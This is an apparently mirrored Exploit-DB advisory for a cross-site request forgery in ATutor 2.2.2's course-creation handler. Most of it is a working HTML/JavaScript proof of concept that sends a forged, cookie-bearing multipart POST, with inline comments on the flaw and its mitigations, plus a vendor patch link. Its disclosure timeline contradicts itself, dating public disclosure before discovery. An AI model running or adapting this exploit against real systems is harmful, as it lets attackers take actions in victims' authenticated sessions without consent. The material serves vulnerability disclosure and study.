ATutor 2.2.2 – Cross-Site Request Forgery (Add New Course)

  • 作者: Saravana Kumar
    日期: 2016-11-13
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/40755/
  • # Exploit Title: ATutor_2.2.2 Learning Management System 
    # Cross-Site Request Forgery (Add New Course)
    # Date: 13-11-2016
    # Software Link: https://github.com/atutor/ATutor/releases/tag/atutor_2_2_2
    # Vendor: http://www.atutor.ca/
    # Exploit Author: Saravana Kumar
    # Contact: https://facebook.com/06saravanakumar
    # Category: webapps
    # Version: 2.2.2
    # Platform: PHP
    # Tested on: [Kali Linux 2.0 | Windows 7]
    # Email: 06saravanakumar@gmail.com
    # Affected URL:
    http://localhost/ATutor/mods/_core/courses/users/create_course.php
    
    ==================================
    Vulnerability Disclosure Timeline:
==================================
2016-11-07: Found the vulnerability and Reported to Vendor.
2016-11-08: Vendor Replied.
2016-11-10: Vendor Fixed the vulnerability.
2016-11-11: Patch released
2016-10-12: Public Disclosure
    
    ########################### CSRF PoC ###############################
     
    <html>
     <!-- CSRF PoC -->
    <body>
    <script>
    // CSRF proof of concept. When a browser that already holds a valid
    // ATutor session loads this page and the button is clicked, it issues
    // the same multipart POST the "create course" form would send, riding
    // on the victim's own cookies. The point being demonstrated is that
    // nothing in the request body below is a per-session anti-CSRF token;
    // the form fields are all predictable, so a cross-site page can
    // reproduce the submission verbatim. Standard mitigations are a
    // synchronizer token validated server-side on create_course.php,
    // SameSite session cookies, and Origin/Referer checks; the vendor patch
    // named under "Solution" below is the upstream fix.
    function submitRequest()
    {
    var xhr = new XMLHttpRequest();
    // Target is the handler listed as "Affected URL" in the header above.
    xhr.open("POST", "http://localhost/ATutor/mods/_core/courses/users/create_course.php", true);
    xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
    // The boundary is fixed and must match every separator used in the body.
    xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------34481053430281");
    // Attach the victim's cookies to this cross-origin request. CORS keeps
    // the *response* unreadable to this page, but the server still receives
    // and processes the POST, which is all a state-changing CSRF needs.
    xhr.withCredentials = true;
    // Hand-assembled multipart/form-data body listing the create-course form
    // fields. This looks like a verbatim capture of a browser submission
    // (MAX_FILE_SIZE appears twice, presumably for that reason).
    var body = "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"form_course\"\r\n" + 
    "\r\n" + 
    "true\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" + 
    "\r\n" + 
    "819200\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"course\"\r\n" + 
    "\r\n" + 
    "0\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"old_access\"\r\n" + 
    "\r\n" + 
    "protected\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"created_date\"\r\n" + 
    "\r\n" + 
    "2016-11-07 06:55:20\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"show_courses\"\r\n" + 
    "\r\n" + 
    "0\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"current_cat\"\r\n" + 
    "\r\n" + 
    "0\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"title\"\r\n" + 
    "\r\n" + 
    "Programming Language\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"pri_lang\"\r\n" + 
    "\r\n" + 
    "en\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"description\"\r\n" + 
    "\r\n" + 
    "Python\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"category_parent\"\r\n" + 
    "\r\n" + 
    "0\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"content_packaging\"\r\n" + 
    "\r\n" + 
    "top\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"rss\"\r\n" + 
    "\r\n" + 
    "0\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"access\"\r\n" + 
    "\r\n" + 
    "protected\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"release_date\"\r\n" + 
    "\r\n" + 
    "0\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"day_release\"\r\n" + 
    "\r\n" + 
    "1\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"month_release\"\r\n" + 
    "\r\n" + 
    "1\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"year_release\"\r\n" + 
    "\r\n" + 
    "2016\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"hour_release\"\r\n" + 
    "\r\n" + 
    "0\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"min_release\"\r\n" + 
    "\r\n" + 
    "0\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"end_date\"\r\n" + 
    "\r\n" + 
    "0\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"day_end\"\r\n" + 
    "\r\n" + 
    "1\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"month_end\"\r\n" + 
    "\r\n" + 
    "1\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"year_end\"\r\n" + 
    "\r\n" + 
    "2017\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"hour_end\"\r\n" + 
    "\r\n" + 
    "0\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"min_end\"\r\n" + 
    "\r\n" + 
    "0\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"setvisual\"\r\n" + 
    "\r\n" + 
    "1\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    // "\x3c" and "\x3e" are < and >: the banner is submitted as raw HTML.
    // Whether create_course.php sanitizes this field before rendering it is
    // not shown here, so a defender should verify that separately.
    "Content-Disposition: form-data; name=\"banner\"\r\n" + 
    "\r\n" + 
    "\x3cp\x3eCan fill content what ever you want.\x3c/p\x3e\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"initial_content\"\r\n" + 
    "\r\n" + 
    "1\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"quota\"\r\n" + 
    "\r\n" + 
    "-2\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"filesize\"\r\n" + 
    "\r\n" + 
    "-3\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"tracking\"\r\n" + 
    "\r\n" + 
    "\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"copyright\"\r\n" + 
    "\r\n" + 
    "\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"boolForce\"\r\n" + 
    "\r\n" + 
    "\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"icon\"\r\n" + 
    "\r\n" + 
    "\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" + 
    "\r\n" + 
    "819200\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    // Empty file part: no icon is actually uploaded.
    "Content-Disposition: form-data; name=\"customicon\"; filename=\"\"\r\n" + 
    "Content-Type: application/octet-stream\r\n" + 
    "\r\n" + 
    "\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"custOptCount\"\r\n" + 
    "\r\n" + 
    "0\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"courseId\"\r\n" + 
    "\r\n" + 
    "\r\n" + 
    "-----------------------------34481053430281\r\n" + 
    "Content-Disposition: form-data; name=\"submit\"\r\n" + 
    "\r\n" + 
    "Save\r\n" + 
    "-----------------------------34481053430281--\r\n";
    // Copy the string into raw bytes and send it as a Blob. Uint8Array keeps
    // only the low 8 bits of each char code, which is lossless here because
    // the body above is pure ASCII.
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++)
    aBody[i] = body.charCodeAt(i); 
    xhr.send(new Blob([aBody]));
    }
    </script>
    <form action="#">
     <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
    </body>
    </html>
    
    ---------------------------------------------------------------------------
     
    Solution:
     
    A patch is available; install it using the ATutor Patcher.
    
    Link to download patch:
    
    http://update.atutor.ca/patch/2_2_2/2_2_2-6/patch.xml
    ---------------------------------------------------------------------------